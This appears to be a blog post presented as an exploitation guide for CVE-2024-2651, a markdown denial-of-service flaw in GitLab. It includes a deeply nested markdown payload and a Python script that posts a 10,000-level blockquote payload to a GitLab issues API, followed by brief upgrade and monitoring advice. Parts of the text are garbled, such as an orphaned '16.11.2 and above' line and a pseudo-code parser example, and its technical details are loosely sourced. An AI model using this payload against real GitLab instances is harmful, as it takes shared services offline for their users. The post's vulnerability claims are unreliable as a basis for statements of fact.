CVE-2024-2651 - Exploiting a GitLab Markdown Denial-of-Service Vulnerability (Exclusive Guide)

A major security flaw, CVE-2024-2651, was discovered in GitLab’s popular CE/EE products. This bug lets attackers crash GitLab by simply using specially crafted markdown content, causing a Denial-of-Service (DoS) attack. In this post, we’ll break down how this vulnerability works, who it affects, how attackers can exploit it (with code snippets), and what you can do to secure your instance.

What is CVE-2024-2651?

CVE-2024-2651 is a vulnerability found in GitLab Community Edition (CE) and Enterprise Edition (EE):

All versions from 16.11 before 16.11.2

If you are running any of these versions, your GitLab could be at risk.

References:
- Official GitLab Advisory
- NVD Details

How does the Exploit Work?

Markdown is a simple way to style text on GitLab (and other platforms). The bug lies in how GitLab’s backend parses markdown documents.

An attacker can make a *malicious* markdown file that triggers excessive processing, causing GitLab to use up CPU and memory—leading to a crash or making the site unresponsive for everyone.

At some point, user-supplied markdown passes through a vulnerable parser (like Kramdown or similar)

# Example code section (pseudo-simplified for illustration)
def render_markdown(content)
  Kramdown::Document.new(content).to_html
end

If the markdown contains things like 100 nested lists, the recursive rendering can exhaust server resources.

Example Exploit (Proof of Concept)

The simplest way to exploit is by submitting an issue, comment, or merge request with a huge and deeply nested markdown payload.

Below is an example markdown you could paste into a GitLab issue or comment field

# Some text

Or a crazy-long list

- Item 1
  - Item 2
    - Item 3
      - Item 4
        - Item 5
          - Item 6
# ...repeat up to 100 levels...

Such markdown forces the backend parser into a loop or a huge recursion stack, making GitLab struggle to render, causing a denial of service.

A simple Python script that automates posting this content

import requests

url = "https://gitlab.example.com/api/v4/projects/1/issues";
headers = {
    "PRIVATE-TOKEN": "YOUR_ACCESS_TOKEN"
}
malicious_markdown = "> " * 10000 + "crash"

data = {
    "title": "CVE-2024-2651 attack test",
    "description": malicious_markdown
}

response = requests.post(url, headers=headers, data=data)
print(response.status_code, response.text)

Warning: *Only run on your own systems for testing!*

16.11.2 and above

Upgrade Now:
If you’re running a vulnerable version, upgrade immediately to the latest security release.

Mitigation:

Increase monitoring for excessive CPU or RAM use.

- Set request and render timeouts in your reverse proxy (NGINX/Apache).

Further Links and References

- GitLab CVE-2024-2651 Advisory
- NVD Entry for CVE-2024-2651
- GitLab Upgrading Guide
- OWASP: Denial of Service Attacks

Conclusion

CVE-2024-2651 shows how a small flaw in a widely used feature (like markdown) can have serious consequences. If your organization uses GitLab, upgrade today and keep an eye on input validation for all user-controlled fields!

Timeline

Published on: 05/14/2024 15:20:14 UTC
Last modified on: 05/14/2024 16:13:02 UTC